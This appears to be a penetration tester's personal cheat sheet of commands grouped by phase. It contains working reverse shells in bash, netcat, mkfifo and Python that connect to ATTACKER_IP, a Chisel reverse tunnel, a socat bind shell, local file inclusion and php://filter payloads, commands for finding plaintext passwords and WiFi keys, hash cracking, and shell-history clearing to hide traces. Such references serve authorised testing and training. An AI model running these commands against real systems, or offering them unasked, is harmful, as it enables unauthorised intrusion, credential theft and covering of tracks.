Tiago Galvão

Pentesting Tips & Notes

Useful commands, shell tricks, and patterns I use frequently during penetration testing.

Stabilizing Shells

i Restores terminal control in unstable shells. Make a reverse shell more usable: 

stty raw -echo; fg

i Creates an interactive bash terminal. Spawn a proper TTY with Python: 

python3 -c 'import pty; pty.spawn("/bin/bash")'

i Fix display issues after getting TTY. Fix terminal after spawning: 

export TERM=xterm
stty rows 40 columns 160

Reverse Shells

i Bash TCP reverse shell. Bash reverse shell: 

bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

i Netcat with -e (exec) support. Netcat (with -e): 

nc -e /bin/sh ATTACKER_IP 4444

i Netcat fallback when -e is disabled. Netcat (no -e support): 

rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/f

i Python reverse shell for restricted systems. Python reverse shell: 

python3 -c 'import socket,subprocess,os;
s=socket.socket(); s.connect(("ATTACKER_IP",4444));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
subprocess.call(["/bin/sh"])'

Port Forwarding / Tunneling

i Expose remote port to your local machine. SSH local port forward: 

ssh -L 8080:localhost:80 user@target

i Reverse tunnel to pivot inside the network. Chisel reverse tunnel: 

chisel server -p 9001 --reverse
chisel client ATTACKER_IP:9001 R:8080:localhost:80

i Creates a bind shell via socat. Socat bind shell: 

socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/sh

Linux Enumeration

i Find SUID binaries. SUID binaries:

find / -perm -4000 2>/dev/null

i Find Linux capability-enabled binaries. Capabilities:

getcap -r / 2>/dev/null

i Shows allowed sudo commands. Check sudo:

sudo -l

i List open/listening ports. Listening ports:

ss -tunlp

i Find writable directories. Writable directories:

find / -writable -type d 2>/dev/null

Privilege Escalation Quick Wins

i Basic privilege escalation check. sudo -l:

sudo -l

i Check for PATH hijacking. PATH:

echo $PATH

i List scheduled tasks. Cron:

cat /etc/crontab

i Find plaintext credentials. Search passwords:

grep -Ri "password" / 2>/dev/null

Web Enumeration

i Bruteforce directories. Directory brute force:

feroxbuster -u http://target/ -x php,txt,html -t 50

i Check robots.txt for hidden paths. Robots.txt:

curl -s http://target/robots.txt

i Basic LFI test. LFI:

?file=../../../../etc/passwd

i Read PHP source code via wrapper. PHP filter wrapper:

?page=php://filter/convert.base64-encode/resource=index.php

Hash Cracking

i Identify hash type. Identify hash:

hashid hash.txt

i Hashcat MD5 mode example. Hashcat:

hashcat -m 0 hash.txt rockyou.txt

i Crack hash using John. John:

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

Windows Enumeration

i List Windows users. Users:

net user

i OS version and patch info. Systeminfo:

systeminfo

i Check running services. Services:

sc query

i Retrieve stored WiFi passwords. WiFi credentials:

netsh wlan show profiles
netsh wlan show profile NAME key=clear

OPSEC / Cleanup

i Check active connections. Network connections:

netstat -tupln

i Clear local history. Clear history:

history -c && history -w